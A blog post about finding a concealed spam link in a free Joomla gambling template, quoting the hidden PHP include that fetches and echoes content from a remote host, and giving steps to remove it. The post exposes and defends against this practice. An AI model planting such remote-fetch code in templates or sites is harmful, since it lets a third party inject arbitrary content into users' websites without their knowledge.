SPAM links in free Joomla templates
Just to make it clear up front, this article is not about removing author credit links from templates with Creative Commons licenses. Authors do deserve credit for their work and their links should be left intact or adjusted to match site's design.
A friend of mine asked to create a simple website for him. We chose Joomla CMS and Gambling template for Joomla (gameon) from Quality Joomla Templates. Although his site had nothing to do with gambling, we liked template's structure and were going to heavily customize it anyway.
Once website was almost ready we noticed that Google had already indexed it, which was a good thing. What was not so good, Google from somewhere pulled text "Thanks to online poker sites" and was displaying this in site's description.
Quickly checked website's source and surely there was following html:
<p>Thanks to <a href="http://onlinepokertool.com" title="online poker sites">online poker sites</a></p>
The link was hidden and was not appearing as a visible text anywhere on the website.
I run a text search through all template files and there was no references to poker, gambling or anything similar. It was clear that template's creators (or somebody who modified template afterwards) somehow obfuscated the link so it's difficult to find and remove it. I've seen similar behaviour when authors make it difficult to remove credit footer links, which some may justify some may not. This, though, had nothing to do with legitimate credit. Credit link was at the bottom where it should be, and online gambling thing was a sneaky attempt to conceal a hidden spam link into somebody's website.
A short investigation revealed how this was setup.
How it works
index.php had following code:
<?php include "html/com_content/archive/component.php"; ?>
This was pulling following from html/com_content/archive/component.php:
<!-- Joomla (GNU PGL) is one of the most popular open source CMS in the world(content management systems) --></div></div></div></div><div class="back-top"></div><div id="main-content"><?php $comp=file_get_contents('http://www.pointlink.net/pk.php'); echo $comp; ?>
Crucial bit here is
<?php $comp=file_get_contents('http://www.pointlink.net/pk.php'); echo $comp; ?>
This pulls the link Thanks to online poker sites from pointlink.net/pk.php and outputs it into html output.
This way they avoid placing words online poker anywhere in template's code thus making detection more difficult. More worryingly they can insert pretty much anything in your website's code by changing pointlink.net/pk.php content.
How to remove
Removal is actually pretty simple.
Because component.php contains part of the template's structure code, you can't simply remove
<?php include "html/com_content/archive/component.php"; ?>
from index.php as this would break the template.
Option 1:
- Open html/com_content/archive/component.php and remove
<?php $comp=file_get_contents('http://www.pointlink.net/pk.php'); echo $comp; ?>
Option 2:
- Delete
<?php include "html/com_content/archive/component.php"; ?>
from index.php and replace this with
</div></div></div></div><div class="back-top"></div><div id="main-content">
(taken from html/com_content/archive/component.php) - Then you can completely remove html/com_content/archive/component.php.
It seems that the same or similar hidden code appears in some other templates from QualityJoomlaTemplates and FreshJoomlaTemplates. Including Business Template for Joomla (JustBusiness), Elegant (Outsourcing), iFreedom, ecoPlanet and others.
I would suggest avoiding these sites and their templates and find more honest developers, who don't try to sneak-in spam links into your website.
